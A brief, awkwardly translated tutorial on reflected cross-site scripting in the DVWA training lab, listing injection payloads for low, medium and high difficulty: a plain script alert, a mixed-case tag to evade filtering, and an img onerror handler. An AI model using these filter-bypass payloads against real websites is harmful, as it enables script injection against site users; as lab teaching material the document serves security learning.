First, what is XSS reflect
Reflective XSS attacks, malicious code is not stored in the target site by tricking the user clicks on a link to a malicious Web site link to the target of attack.
Two, DVWA combat
1, low difficulty
Without any filter, then write directly js code
<script>alert('hack')</script>
2, medium difficulty
Direct input is filtered out.
Use case can be bypassed,
<sCript>alert('hack')</Script>
3, high difficulty
script tag was filtered. Use the img tag, can be bypassed.
<img src=1 onerror=alert('hack')>